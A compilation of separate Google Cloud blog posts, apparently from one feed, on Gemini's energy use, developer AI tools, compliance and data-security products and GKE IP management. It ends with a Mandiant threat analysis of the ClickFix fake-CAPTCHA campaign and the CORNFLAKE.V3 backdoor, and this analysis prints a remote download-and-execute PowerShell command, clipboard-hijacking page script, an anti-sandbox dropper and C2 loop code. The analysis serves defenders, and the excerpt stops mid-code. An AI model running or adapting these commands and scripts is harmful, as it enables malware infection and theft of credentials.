AI is unlocking scientific breakthroughs, improving healthcare and education, and could add trillions to the global economy. Understanding AI’s footprint is crucial, yet thorough data on the energy and environmental impact of AI inference — the use of a trained AI model to make predictions or generate text or images — has been limited. As more users use AI systems, the importance of inference efficiency rises.
That’s why we’re releasing a technical paper detailing our comprehensive methodology for measuring the energy, emissions, and water impact of Gemini prompts. Using this methodology, we estimate the median Gemini Apps text prompt uses 0.24 watt-hours (Wh) of energy, emits 0.03 grams of carbon dioxide equivalent (gCO2e), and consumes 0.26 milliliters (or about five drops) of water1 — figures that are substantially lower than many public estimates. The per-prompt energy impact is equivalent to watching TV for less than nine seconds.
At the same time, our AI systems are becoming more efficient through research innovations and software and hardware efficiency improvements. For example, over a recent 12 month period, the energy and total carbon footprint of the median Gemini Apps text prompt dropped by 33x and 44x, respectively, all while delivering higher quality responses. These results are built on our latest data center energy emissions reductions and our work to advance carbon-free energy and water replenishment. While we’re proud of the innovation behind our efficiency gains so far, we’re committed to continuing substantial improvements. Here’s a closer look at these ongoing efforts.
Calculating the environmental footprint of AI at Google
Detailed measurement lets us compare across different AI models, and the hardware and energy they run on, while enabling system-wide efficiency optimizations — from hardware and data centers to the models themselves. By sharing our methodology, we hope to increase industry-wide consistency in calculating AI’s resource consumption and efficiency.
Measuring the footprint of AI serving workloads isn’t simple. We developed a comprehensive approach that considers the realities of serving AI at Google’s scale, which include:
Full system dynamic power: This includes not just the energy and water used by the primary AI model during active computation, but also the actual achieved chip utilization at production scale, which can be much lower than theoretical maximums.
Idle machines: To ensure high availability and reliability, production systems require a degree of provisioned capacity that is idle but ready to handle traffic spikes or failover at any given moment. The energy consumed by these idle chips must be factored into the total energy footprint.
CPU and RAM: AI model execution doesn’t happen solely in ML accelerators like TPUs and GPUs. The host CPU and RAM also play a crucial role in serving AI, and use energy.
Data center overhead: The energy consumed by the IT equipment running AI workloads is only part of the story. The infrastructure supporting these computations — cooling systems, power distribution, and other data center overhead — also consumes energy. Overhead energy efficiency is measured by a metric called Power Usage Effectiveness (PUE).
Data center water consumption: To reduce energy consumption and associated emissions, data centers often consume water for cooling. As we optimize our AI systems to be more energy-efficient, this naturally decreases their overall water consumption as well.
Many current AI energy consumption calculations only include active machine consumption, overlooking several of the critical factors discussed above. As a result, they represent theoretical efficiency instead of true operating efficiency at scale. When we apply this non-comprehensive methodology that only considers active TPU and GPU consumption, we estimate the median Gemini text prompt uses 0.10 Wh of energy, emits 0.02 gCO2e, and consumes 0.12 mL of water. This is an optimistic scenario at best and substantially underestimates the real operational footprint of AI.
Our comprehensive methodology’s estimates (0.24 Wh of energy, 0.03 gCO2e, 0.26 mL of water) account for all critical elements of serving AI globally. We believe this is the most complete view of AI’s overall footprint.
Our full-stack approach to AI — and AI efficiency
Gemini’s dramatic efficiency gains stem from Google’s full-stack approach to AI development — from custom hardware and highly efficient models, to the robust serving systems that make these models possible. We’ve built efficiency into every layer of AI, including:
More efficient model architectures: Gemini models are built on the Transformer model architecture developed by Google researchers, which provide a 10-100x efficiency boost over the previous state-of-the-art architectures for language modeling. We design models with inherently efficient structures like Mixture-of-Experts (MoE) and hybrid reasoning. MoE models, for example, allow us to activate a small subset of a large model specifically required to respond to a query, reducing computations and data transfer by a factor of 10-100x.
Efficient algorithms and quantization: We continuously refine the algorithms that power our models with methods like Accurate Quantized Training (AQT) to maximize efficiency and reduce energy consumption for serving, without compromising response quality.
Optimized inference and serving: We constantly improve AI model delivery for responsiveness and efficiency. Technologies like speculative decoding serve more responses with fewer chips by allowing a smaller model to make predictions that are then quickly verified by a larger model, which is more efficient than having the larger model make many sequential predictions on its own. Techniques like distillation create smaller, more efficient models (Gemini Flash and Flash-Lite) for serving that use our larger, more capable models as teachers. Faster machine learning hardware and models enable us to use more efficient larger batch sizes when handling requests, while still meeting our latency targets.
Custom-built hardware: We’ve been designing our TPUs from the ground up for over a decade to maximize performance per watt. We also co-design our AI models and TPUs, ensuring our software takes full advantage of our hardware — and that our hardware is able to efficiently run our future AI software when both are ready. Our latest-generation TPU, Ironwood, is 30x more energy-efficient than our first publicly-available TPU and far more power-efficient than general-purpose CPUs for inference.
Optimized idling: Our serving stack makes highly efficient use of CPUs and minimizes TPU idling by dynamically moving models based on demand in near-real-time, rather than using a “set it and forget” approach.
ML software stack: Our XLA ML compiler, Pallas kernels, and Pathways systems enable model computations expressed in higher-level systems like JAX to run efficiently on our TPU serving hardware.
Ultra-efficient data centers: Google’s data centers are among the industry’s most efficient, operating at a fleet-wide average PUE of 1.09.
Responsible data center operations: We continue to add clean energy generation in pursuit of our 24/7 carbon-free ambition, while advancing our aim to replenish 120% of the freshwater we consume on average across our offices and data centers. We also optimize our cooling systems, balancing the local trade-off between energy, water, and emissions, by conducting science-backed watershed health assessments, to guide cooling type selection and limit water use in high-stress locations.
Our commitment to efficient AI
Gemini’s efficiency gains are the result of years of work, but this is just the beginning. Recognizing that AI demand is growing, we’re heavily investing in reducing the power provisioning costs and water required per prompt. By sharing our findings and methodology, we aim to drive industry-wide progress toward more efficient AI. This is essential for responsible AI development.
1. A point-in-time analysis quantified the energy consumed per median Gemini App text-generation prompt, considering data from May 2025. Emissions per prompt was estimated based on energy per prompt, and applying Google’s 2024 average fleetwide grid carbon intensity. Water consumption per prompt was estimated based on energy per prompt, and applying Google’s 2024 average fleetwide water usage effectiveness. These findings do not represent the specific environmental impact for all Gemini App text-generation prompts nor are they indicative of future performance. 2. The results of the above analysis from May 2025 were compared to baseline data from the median Gemini App text-generation prompt in May 2024. Energy per median prompt is subject to change as new models are added, AI model architecture evolves, and AI chatbot user behavior develops. The data and claims have not been verified by an independent third-party.
Do you remember packing for an extended trip twenty years ago? We had to load up a camera, a day planner, a pile of books, a handheld gaming device, a map-stuffed tourist guide, a phone, a CD player, and maybe some cashier’s checks. Now? Just remember your smartphone!
This is an example of consolidation, but sometimes diversification happens. For example, it wasn’t long ago that your “computer” was simply a desktop PC that was your one device for everything. Now, we have laptops for portable work, tablets for casual digital consumption, smartphones for on-the-go internet, smart TVs for watching every type of content, and a myriad of gaming consoles.
This dynamic reminds me of the current state of developer tooling. Until recently, it was fairly static — UX design tools for mock-ups, IDEs to write code, build systems to assemble artifacts, systems and shell scripting to get infrastructure and apps deployed. It’s become wildly more diverse and dynamic thanks to generative AI. What we do, and what we use, will never be the same.
So when do I use what? Google alone offers LLM interfaces like the Gemini app and Google AI Studio, IDE extensions like Gemini Code Assist, browser-based dev environments like Firebase Studio, along with agentic services like Jules and the Gemini CLI. It’s easy to feel overwhelmed. Let’s break it down.
This diversification of tools is due, in part, to the new ways AI can assist us in software engineering.
We now have delegated, agentic options. Think of outsourcing the work to a third party where you provide detailed instructions, and only have limited interactions until the work is complete. The goal here is to get the work done quickly, and you aren’t focused on growing your own knowledge.
The next category is supervised, where you have AI acting more like someone who works for you. It’s more interactive, but you’re scaling by providing experience-based intent to an AI agent.
The final category is collaborative. Here, we’re in a conversational interaction with an AI assistant, going back and forth as we “learn” together.
Key takeaways for each AI developer tool
Jules is best for explicit instructions that can drive unattended batch work—add documentation, improve test coverage, perform surgical code modernizations—against source code in GitHub.com
No infrastructure or machinery to manage and update
Iterate with Jules on a plan before sending it off to do work
Get back a set of changes and a pull request to accept them
The Gemini CLI offers an open, fast, and flexible interface for working with code and content interactively or through delegation
Lightweight CLI tool that only requires a local install of Node
Many extensibility points including built-in tools along with support for MCP
Built into other tools like Gemini Code Assist and Firebase Studio
The open source Gemini CLI GitHub Actions are ideal for delegating background work to code repos—issue triage, pull request review—through async or user-initiated triggers
Comes with generous free usage limits for premier Gemini models. It supports enterprise access through Vertex AI models and also works with your Gemini Code Assist license.
Gemini Code Assist provides a rich IDE extension for conversational or agentic interactions with a codebase
Plug-in for Visual Studio Code and Jetbrains IDEs
Offers code completion, test generation, code explanation, and code generation
Extensibility through custom commands, tools support, and code customization on private codebases. Agent mode is powered by the Gemini CLI and enables more complex interactions
Free tier along with per-user-per-month pricing for teams
Firebase Studio is the right choice when you want to build professional-grade software without the need to be a professional developer, while working in a Google-managed and browser-based dev environment
Built-in templates for popular frameworks and languages to start your project
Let Gemini vibe code your app or dive into the code thanks to the full power of an underlying customizable VM
Configure the workspace environment using nix
No cost during preview, and more environments available for those who sign up for the Google Developer Program
Google AI Studio delivers the best way to interact with Google’s latest models, experiment with prompts, and vibe code lightweight web apps
Generate media, use the Live API for interactive sessions, and write prompts against Gemini and Gemma models
Write prompts, use tools, ground with Google Search, and run comparisons
Get API keys to call Gemini models programmatically
Generous free tier along with a paid tier offering higher rate limits, more features, and different data handling
Cheatsheet:
Choose the Gemini app for quick app prototyping
Choose Google AI Studio for prompt experimentation with specific models and capabilities.
Choose Gemini Code Assist for AI-assisted software development in your environment, with your preferred toolchain.
Choose Firebase Studio when you want to come to a fully Google-managed environment to prototype or vibe code beautiful software without needing to be a full-time software developer.
Choose the Gemini CLI when you’re working with a wide array of generative AI projects and want the speed and portability of an agentic CLI. And choose the Gemini CLI GitHub Actions when you want to use Google Cloud security and models while triggering interactive or background tasks for GitHub-based projects.
Choose Jules when you’ve got GitHub-based projects that need changes that can be clearly articulated in a set of instructions.
I haven’t seen software development tools change this much—or such an eager willingness to try anything new—at any time in my career. It’s exciting and confusing. It’s important to see these tools as complementary, and you’ll likely use a mix to accomplish your tasks. At Google, we’re going to continue to focus on giving you the best AI tools to build the best AI apps. Let us know how to make both experiences better!
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997b73d340>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
As organizations increase their focus on security and regulatory compliance, Google Cloud is helping our customers meet these obligations by fostering better collaboration between security and compliance teams, and the wider organization they serve.
To help simplify and enhance how organizations manage security, privacy, and compliance in the cloud, we’re thrilled to announce that Google Cloud Compliance Manager is now available in preview. Integrated into Security Command Center, this new capability provides a unified platform for configuring, monitoring, and auditing security and compliance across your infrastructure, workloads, and data.
Our AI-powered approach to supporting security and compliance obligations automates monitoring, detection, and reporting, and can help reduce manual effort while improving accuracy.
The bidirectional ability to translate regulatory controls into service level configurations or technical controls, and technical controls into policies, is essential for mitigating IT risks and streamlining operations. The ability to understand and visualize this interrelation between regulations and technical guardrails can help organizations establish a unified perspective on security and compliance risks and their remediation.
Security and Compliance are interrelated.
Reducing risk with smarter compliance
Many organizations have security and compliance obligations that need to align with government, industry, and enterprise-specific requirements. Compliance Manager allows you to configure these obligations using simple yet customizable constructs, prevent misconfigurations, monitor drifts and generate evidence of conformance within the same product experience. It supports standard security and compliance benchmarks, while allowing for customization at multiple levels.
Compliance Manager is designed to address these industry needs by unifying the entire security and compliance journey into three phases: configure, monitor, and audit.
Configure: You can express and enforce your security, privacy, and compliance intent based on your needs and risk tolerance using Compliance Manager, which provides a comprehensive library of frameworks and cloud controls, addressing global security and compliance regulations across industries and sectors. You can deploy these in preventive, detective, and evidence generation modes at different granularities, including organization, folder, and projects. You can also customize standard frameworks, and create your own to meet specific organization policies and unique needs.
Monitor: To continuously monitor and generate reports against your intended posture, Compliance Manager provides near real-time visibility into your compliance status, enabling proactive identification and remediation of potential issues. You can view findings and risks, with customizable and downloadable reports.
Audit: Audit Manager helps you generate evidence of conformance to security, privacy, and compliance that can be used for internal and external audits. It can automate and simplify the audit process, help you assess workloads for compliance, gather required evidence, and provide comprehensive audit reports. The effectiveness of this audit evidence generation has been validated through our partnership with FedRAMP for the FedRAMP 20X initiative.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997bbd0df0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Core constructs: Frameworks and CloudControls
Compliance Manager introduces Frameworks and CloudControls as two new platform components to express security, privacy, and compliance intent.
Frameworks are collections of technical controls that can also be mapped to regulatory controls. A framework can represent the following:
Industry-defined security and compliance standards such as CIS, CSA-CCM, SOC2, ISO 27001, NIST-800-53, FedRAMP-High, PCI-DSS, GDPR.
Google Cloud-defined security, privacy, and compliance best practices, including for AI security, data security, and cloud security.
Customer-defined collection of technical policies and controls representing company or industry best practices.
CloudControls are platform-agnostic building blocks that encapsulate the business logic for configuration (preventative mode), checks (detective mode), and evidence collection (audit mode). These controls support settings and checks for multiple resources and attributes, and can be parameterized for deployment time customizations. Customers can also write their own custom cloud controls.
Compliance Manager comes with a library of Frameworks and Cloud Controls, and we plan to add more as customer needs evolve. You can customize these framework templates or compose your own by selecting from the library Cloud Controls. You can also create custom Cloud Controls either manually or with help from Compliance Manager’s GenAI based control authoring feature, providing quick time to value.
How to get started
Compliance Manager can be accessed directly from the Compliance navigation link, located under Security in Google Cloud Console. Go to the Compliance Overview page to start using it.
Compliance Manager overview on Google Cloud Console.
We have more updates planned for Compliance Manager as we build out its robust capabilities. We value your input, and would love to incorporate your feedback into our product roadmap. You can contact us through your Google Cloud account team, or send us your feedback at compliance-manager-preview@google.com.
In the age of data democratization and generative AI, the way organizations handle data has changed dramatically. This evolution creates opportunities — and security risks. The challenge for security teams isn’t just about protecting data; it’s about scaling security and compliance to meet this new reality.
While traditional security controls are vital to risk mitigation, many data security posture management solutions lack the necessary capabilities that today’s organizations require. For example, an organization with AI workloads needs to make sure that sensitive data is not leaking into the training environment; that intellectual property such as models and weights are protected from exfiltration; and that all their models support “compliance explainability.”
There are four key concerns that organizations should understand for robust data security: where sensitive data resides, how it’s used, what controls can secure it, and the monitoring tools available to provide evidence for compliance. Our new Data Security Posture Management (DSPM) offering, now in preview, provides end-to-end governance for data security, privacy, and compliance.
DSPM capabilities include differentiating advanced data controls that match security, privacy, and compliance requirements and align with business needs. Available as part of Security Command Center, this Google Cloud-native solution can help reduce tooling complexity, and provides native platform experience.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997b6f5280>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
DSPM starts with a data map that offers a birds-eye view of data across your Google Cloud environment, its sensitivity level, and its default security posture. Discovery can help apply policies to monitor and secure their data, allowing curated controls to be matched with their sensitive data needs.
With Google Cloud DSPM, security and compliance teams can:
Discover data: DSPM provides comprehensive visibility into your data estate. It automatically discovers data assets across your Google Cloud environment and uses sensitivity labels from Sensitive Data Protection to help you understand what data you have and where it resides.
Assess risk: DSPM evaluates your current data security posture against Google Cloud’s recommended best practices, and can help identify potential vulnerabilities and misconfigurations.
Protect data: DSPM deploys data security frameworks by mapping security and compliance requirements to control policies, and can help you monitor them in near-real time.
Simplify compliance: DSPM can audit data against relevant compliance frameworks, help you pinpoint gaps, and generate detailed, evidence-backed compliance reports. DSPM can also help assess compliance with HIPAA, GDPR, and PCI DSS.
A visual overview of Google Cloud’s Data Security Posture Management solution.
How advanced DSPM controls help with security and compliance requirements
Security teams can get started by identifying sensitive data in their organization’s Google Cloud environment, and mapping desired security and compliance outcomes to specific data controls. To make this process easier, DSPM offers advanced controls, such as data access governance, flow governance, data protection, and data deletion controls to meet security and compliance outcomes.
Currently, these controls can be applied in detective mode on data boundaries, including organization, folder, and project. You can also use Google Cloud Sensitive Data Protection (SDP) to scan for specific types of sensitive data.
Applying advanced data controls to protect data.
Data access governance Using data access governance control, you can govern access to sensitive data, and restrict access in detective mode, to approved principals.
For example, an organization that needs governance around customer billing data can create a policy to allow only the fraud detection team to access sensitive customer billing information, and apply that control policy across sensitive data. Once applied, the policy will follow the data and surface any non-compliant access events.
Flow governance Using data flow control, you can restrict how data is moved across country boundaries in detective mode, to ensure that sensitive customer data is not moved outside a country boundary. As an example, let’s consider an organization with operations in a specific country that has a compliance requirement to not move customer data outside the country’s geographic boundary. With data flow governance, the organization can create a policy to only allow flow of data within that country, and apply that policy to sensitive data. Once applied, the control will surface any non-compliant read operations from outside the allowed geographic boundary.
Data protection Data protection controls can help manage the encryption key configuration, such as enforcing customer managed encryption keys (CMEK). You can create a policy to enforce CMEK as a policy on the keys protecting sensitive data.
Data deletion Using data deletion controls, you can manage the maximum duration that the data will be retained. You can create a policy with an allowed maximum retention period, and apply it to sensitive data.
Help shape the future of data security
We’re inviting security and compliance teams to be among the first to experience the power of Google Cloud DSPM. As part of the DSPM preview, organizations can:
Activate DSPM and begin evaluating its capabilities for specific business needs. For a detailed guide, please refer to the user guide.
Join the Technical Advisory Council and Customer Design Panels to provide valuable feedback that can influence DSPM development.
Work with Google Cloud experts to optimize their data security strategy and ensure a successful implementation.
For further questions, contact your Google Cloud account team, or or send us your feedback at dspm-pm@google.com.
Managing IP addresses in Kubernetes can be a complex and daunting task — but a crucial one. In Google Kubernetes Engine (GKE), it’s important that you manage IP addresses effectively, given the resource-constrained IPv4 address space. Sub-optimal configurations can lead to:
IP inefficiency: Poor utilization of the limited IPv4 address space
Complexity: Significant administrative overhead to plan and allocate IP addresses
Errors: Increased risk of hitting IP_SPACE_EXHAUSTED errors, which halt cluster scaling and application deployments
To help, we are pleased to announce the public preview of a new feature designed to simplify IP address management (IPAM) and improve IP efficiency in your GKE clusters: GKE auto IPAM.
Simplified and efficient IP management
GKE auto IPAM simplifies IPAM by dynamically allocating and/or de-allocating IP address ranges for nodes and pods as your cluster grows. This eliminates the need for large, potentially wasteful, upfront IP reservations and manual intervention during cluster scaling.
Benefits of GKE auto IPAM
Optimize resource allocation and enhance IP efficiency: Start with smaller IP ranges and let auto IPAM seamlessly expand them as needed, helping to ensure efficient utilization of your valuable IPv4 address space.
Scale with confidence and prevent IP exhaustion: Minimize your chances of running out of IPs. Auto IPAM proactively manages and dynamically allocates / deallocates addresses as your cluster grows, making it easy to scale.
Reduce administrative overhead: Simplify IPAM management with automated allocation and configuration, freeing up valuable time for your team — no manual intervention required.
Enable demanding workloads: Support resource-intensive applications that require rapid scaling by ensuring sufficient IP capacity is dynamically available on demand for growth and performance.
Getting started
This feature is compatible with both new and existing clusters running GKE version 1.33 or greater. Today, you can configure it with either gcloud CLI or API. Terraform and UI support is coming soon.
Updated cluster creation UI/UX
We’ve also overhauled the GKE cluster creation UI to make it simpler and more intuitive. The old interface buried critical IPAM settings deep in the cluster creation flow, making it difficult to discover, configure, and validate crucial network settings.Elevating IPAM and bringing it to the forefront provides a more intuitive and streamlined experience, so that you can easily and confidently define your network topology from the outset, for more robust and error-free cluster deployments.
IP address management made easy
GKE auto IPAM allows you to scale your clusters up and scale your clusters down on-demand, optimizing IP address resource allocation and reducing the administrative overhead of cluster operations. Try it today!
Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.
Introduction
Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.
While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:
UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.
UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.
This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518’s access-as-a-service operation as an entry vector into target environments.
The CORNFLAKE Family
CORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP (PHP Variant) that retrieves payloads via HTTP. Supported payload types include shell commands, executables and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.
The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.
Malware Family
CORNFLAKE
CORNFLAKE.V2
CORNFLAKE.V3
Language
C
JS
JS or PHP
Type
Downloader
Downloader
Backdoor
C2 Communication
TCP socket (XOR encoded)
HTTP (XOR encoded)
HTTP (XOR encoded)
Payload types
DLL
DLL,EXE,JS,BAT
DLL,EXE,JS,BAT,PS
Persistence
No
No
Registry Run key
Table 1: Comparison of CORNFLAKE malware variants
Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle
Initial Lead
Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.
Mandiant observed that a PowerShell script was executed via the Run command using the Windows+Rshortcut. Evidence of this activity was found in the HKEY_USERSUserSOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:
Name: a
Value: powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1
The RunMRUregistry key stores the history of commands entered into the Windows Run (shortcut Windows+R) dialog box.
The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.
Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage
As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image. The webpage accomplished this with the following JavaScript code:
// An image with the reCAPTCHA logo is displayed on the webpage
<div class="c" id="j">
<img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png"
alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1";
// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");
The PowerShell command copied to clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u, where $uindicates the UNIX epoch timestamp of the download.
As a result, the PowerShell process connects to the aforementioned IP address and port with URL path 1742214432(UNIX epoch timestamp), as shown in the following HTTP GET request:
GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.]141:8080
Connection: Keep-Alive
The following PowerShell dropper script, similar to 1742214432, was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:
# Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object
-ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
exit 0;
}
# Get memory info for evasion check.
$TotalMemoryGb =
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb =
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb
# Exit if total memory is low or calculated "used" memory is low
(possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
exit 0
}
# Exit if computer name matches default pattern
(possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
exit 0
}
# Pause execution briefly.
sleep 1
# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")
# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile
# Try block for file extraction using COM objects.
try {
$Shell = New-Object -ComObject Shell.Application
$ZIP = $Shell.NameSpace($ZipFile)
$Destination = $Shell.NameSpace($DestinationFolder)
# Copy/extract contents silently.
$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
exit 0
}
# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder,
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")
# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`""
-WindowStyle Hidden
The PowerShell dropper’s execution includes multiple steps:
Check if it is running inside a virtual machine and, if true, exit
Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip, write the file to %TEMP%downloaded.zip and extract its contents to the directory %APPDATA%node-v22.11.0-win-x64
Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%node-v22.11.0-win-x64node.exe -e “<base64_decoded_CORNFLAKE.v3>”
The PowerShell dropper’s anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system’s computer name matches the regular expression DESKTOP-S* or the target system’s manufacturer is QEMU.
As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip (MD5:e033f9800a5ba44b23b3026cf1c38c72). This archive contained the Node.js runtime environment, including its executable file node.exe, which was then extracted to %APPDATA%node-v22.11.0-win-x64. The Node.js environment allows for the execution of JavaScript code outside of a web browser.
The extracted %APPDATA%node-v22.11.0-win-x64node.exe binary was then launched by Powershell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.
Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:
Host and AD-based reconnaissance
Persistence via Registry Run key
Credential harvesting attempts via Kerberoasting
The following process tree was observed during the investigation:
explorer.exe
↳ c:windowssystem32windowspowershellv1.0powershell.exe
-w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
↳ c:users<user>appdataroamingnode-v22.11.0-win-x64node.exe
-e "{CORNFLAKE.V3}"
↳ c:windowssystem32windowspowershellv1.0powershell.exe
-c "{Initial check and System Information Collection}"
↳ C:WindowsSystem32ARP.EXE -a
↳ C:WindowsSystem32chcp.com 65001
↳ C:WindowsSystem32systeminfo.exe
↳ C:WindowsSystem32tasklist.exe /svc
↳ c:windowssystem32cmd.exe /d /s /c "wmic process where
processid=16004 get commandline"
↳ C:WindowsSystem32cmd.exe /d /s /c "{Kerberoasting}"
↳ c:windowssystem32cmd.exe /d /s /c
"{Active Directory Reconnaissance}"
↳ c:windowssystem32cmd.exe /d /s /c "reg add
{ChromeUpdater as Persistence}"
Analysis of CORNFLAKE.V3
The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.
When the script initially executes, a check verifies the command line arguments of the node.exeprocess, keeping in mind that the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process which has1 as an additional argument, then the initial node.exe exits. When the child process runs, since it now has three arguments, it will pass this initial check and execute the rest of the script.
This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.
Following this, the malware attempts to collect system information using the following code:
This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync. It gathers the script’s version, user privilege level (System, Admin, User), standard systeminfo output, running tasks/services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive), and the ARP table (arp -a).
C2 Initialization
After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloopfunction. The script contains support for two separate lists, hosts and hostsIP, which are both used in the C2 communication logic. Initially, the mainloop function attempts to connect to a random host in thehosts list, however, if unable to do so, it will attempt to connect to a random IP address in the hostsIP list instead. Once a connection is successfully established, the mainfunction is called.
// Define lists of hostnames and IP addresses for the command
and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];
// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;
// Main loop to continuously communicate with the command
and control server.
async function mainloop() {
let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];
while (true) {
// Wait for the specified delay.
await new Promise((resolve) => setTimeout(resolve, delay));
try {
// Attempt to communicate with the command and control server.
if (useIp < 200) {
await main(toHost, PORT_IP);
useIp = 0;
} else {
await main(toIp, PORT_IP);
useIp++;
if (useIp >= 210) useIp = 0;
}
} catch (error) {
// Handle errors during communication.
console.error('Error with HTTP request:', error.message);
toHost = hosts[Math.floor(Math.random() * 1000) %
hosts.length];
toIp = hostsIp[Math.floor(Math.random() * 1000) %
hostsIp.length];
useIp++;
delay = 1000 * 10;
continue;
}
// Set the delay for the next attempt.
